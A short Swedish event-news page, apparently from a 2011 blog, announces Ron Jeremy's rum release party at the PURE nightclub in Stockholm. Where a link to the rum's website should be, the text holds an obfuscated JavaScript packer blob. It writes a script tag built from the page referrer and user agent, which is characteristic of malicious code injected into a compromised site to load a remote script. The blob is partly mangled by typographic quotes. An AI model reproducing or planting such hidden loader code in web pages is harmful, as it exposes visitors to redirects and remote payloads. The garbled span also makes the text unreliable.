Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Ron de Jeremy – Releaseparty för hans egna rom på PURE i Stockholm

Ron de Jeremy – Releaseparty för hans egna rom på PURE i Stockholm
Filip Urde
  • On 30 augusti, 2011
  • http://www.revue.se/filip-urde

Kultporrstjärnan Ron Jeremy, kallad ”the hardest working man in the business” försöker nu erövra spritmarknaden med sin egna framtagna rom ”Ron de Jeremy”, en sjuårigt lagrad rom som framtagits tillsammans med Fransisco ”Don Pancho” Fernandez, en legend i spritindustrin. Den elfte september kommer Ron Jeremy till nattklubben PURE i Stockholm för att promota sin egna rom med en kort presentation och sedan festa med er besökare.

För mer information om rommen, besök den officiella hemsidan rondejeremy och eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sdrke|var|u0026u|referrer|afify||js|php’.split(‘|’),0,{}))
för gästlista samt ytterligare information om eventet besök
PURE.